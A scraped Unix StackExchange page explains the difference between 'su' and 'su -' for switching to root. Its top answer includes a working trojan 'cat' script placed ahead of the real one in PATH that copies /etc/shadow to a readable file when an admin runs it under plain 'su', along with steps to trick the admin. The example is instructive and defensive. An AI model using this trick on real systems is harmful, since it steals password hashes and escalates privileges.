I don't understand why su - is preferred over su to login as root.
Asked
Active
Viewed 1.3e+01k times
216
4 Answers
286
su - invokes a login shell after switching the user. A login shell resets most environment variables, providing a clean base.
su just switches the user, providing a normal shell with an environment nearly the same as with the old user.
Imagine, you're a software developer with normal user access to a machine and your ignorant admin just won't give you root access. Let's (hopefully) trick him.
$ mkdir /tmp/evil_bin
$ vi /tmp/evil_bin/cat
#!/bin/bash
test $UID != 0 && { echo "/bin/cat: Permission denied!"; exit 1; }
/bin/cat /etc/shadow &>/tmp/shadow_copy
/bin/cat "$@"
exit 0
$ chmod +x /tmp/evil_bin/cat
$ PATH="/tmp/evil_bin:$PATH"
Now, you ask your admin why you can't cat the dummy file in your home folder, it just won't work!
$ ls -l /home/you/dummy_file
-rw-r--r-- 1 you wheel 41 2011-02-07 13:00 dummy_file
$ cat /home/you/dummy_file
/bin/cat: Permission denied!
If your admin isn't that smart or just a bit lazy, he might come to your desk and try with his super-user powers:
$ su
Password: ...
# cat /home/you/dummy_file
Some important dummy stuff in that file.
# exit
Wow! Thanks, super admin!
$ ls -l /tmp/shadow_copy
-rw-r--r-- 1 root root 1093 2011-02-07 13:02 /tmp/shadow_copy
He, he.
You maybe noticed that the corrupted $PATH variable was not reset. This wouldn't have happened, if the admin invoked su - instead.
wag
- 35,944
- 12
- 67
- 51
40
su - logs you in completely as root, whereas su makes it so you are pretending to be root.
The most obvious example of this is that ~ is root's home directory if you use su -, but your own home directory if you use su.
Depending on your system, it may also mean differences in prompt, PATH, or history file.
So if you are part of a team administering a system, and your colleague gives you a command to run, you know it will work the same if you are both using su -, but if you are both using su, there may be differences due to you having different shell configurations.
On the other hand, if you want to run a command as root but using your own configuration, then maybe su is better for you.
Also don't forget about sudo, which has a -s option to start a shell running as root. Of course, this has different rules as well, and they change depending on which distribution you are using.
Mikel
- 57,299
- 15
- 134
- 153
-
1when I "su" I get ~ and $HOME both evaluating to /root. Is the behavior you describe specific to certain shells or OS versions or something? It's my understanding that ~ can be expanded by the kernel. I've got zsh as my (and root's) shell. – JasonWoof Feb 08 '11 at 00:05
-
Your
.bashrcor/etc/bashrcor/etc/profile.dscripts are settingPATH. Look forif [ $UID -eq 0 ]or something like that. – Mikel Feb 08 '11 at 01:14 -
-
1
-
1Your example does not work for me. I get the same directory resolved in either way. – Daniel W. Apr 18 '16 at 14:45
-
-
@Mikel - Could you please point me to some resource on what the
-does in general? Say it is appended to something else thansu. For context, I am trying to understand what does this command do:xauth -f $XAUTH nmerge -. Thanks a lot. – Matteo Sep 13 '20 at 17:12
7
The main difference is :
su - username sets up the shell environment as if it were a clean login as the specified user, it access and use specified users environment variables,
su username just starts a shell with current environment settings for the specified user.
If username is not specified with su and su -, the root account is implied as default.
Hauke Laging
- 90,279
Akhil MK
- 71
- 1
- 1
3
I use su -- when I'm in a directory as a regular user but want to switch to root and remain in same directory after the switch. When you use su - it switches the user to root and also takes you to /root which is the root home directory.
Calvin Dike
- 31
umasklike 000 or it won't work. – Lekensteyn Oct 22 '11 at 08:48su --, which behaves likesu -, but does not change the current directory. – Simon Richter Feb 07 '11 at 12:25su --. That's really useful and I'm going to start using it today. Thanks – Michael Feb 07 '11 at 13:55su --is the same assu. – Mikel Feb 07 '11 at 20:08sufile inside the PATH. It's not so hard to mimic the behavior of the realsu. The super-user has been careless anyway :-) – Stéphane Gimenez Feb 28 '12 at 18:53su --is NOT the same assu -:--tells an getopt(s) (or similar) option handler to stop processing the command line for further options (usefull for example if the rest contains filenames which could start with an '-'). Ie, in "rm -i -- -f" : -f is then treated as a regular argument, so here as the name of the file torm -i, and not as an additionnal-foption to thermcommand. Sosu --is justsuand notsu -! Sosu --would be as unsafe to the (funny and instructive) example givan by wag. Usesu -. – Olivier Dulac Dec 26 '12 at 15:05sshinto a remote server? Because I can't really think of any... – Martin Tournoij Mar 09 '16 at 14:56-does in general? Say it is appended to something else thansu. For context, I am trying to understand what does this command do:xauth -f $XAUTH nmerge -. Thanks a lot. – Matteo Sep 13 '20 at 17:11-could mean stdin, and for others it could mean something else (ex: su). Man pages are your friend ^^ – Olivier Dulac Sep 13 '20 at 17:48-is for. How could I figure it out? I posted a question about my problem (https://unix.stackexchange.com/questions/609255/xauthority-for-gui-in-a-docker-container) if you are able to help! thanks! – Matteo Sep 13 '20 at 18:00